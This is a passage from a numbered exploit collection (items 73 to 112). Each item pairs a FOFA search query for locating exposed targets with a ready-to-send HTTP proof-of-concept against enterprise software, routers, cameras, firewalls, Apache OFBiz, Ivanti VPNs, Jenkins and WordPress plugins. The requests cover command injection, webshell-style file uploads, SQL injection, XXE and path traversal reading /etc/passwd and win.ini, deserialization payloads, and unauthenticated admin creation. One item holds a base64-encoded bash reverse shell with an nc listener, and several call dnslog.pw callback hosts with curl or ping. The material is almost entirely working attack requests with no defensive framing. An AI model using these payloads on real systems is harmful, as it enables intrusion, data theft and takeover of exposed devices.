S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) mobile campus (掌上校园) service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda (速达) Tianyao software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DAS-Security MingYu (安恒明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DAS-Security MingYu (安恒明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin (奇安信) 网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML file content; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

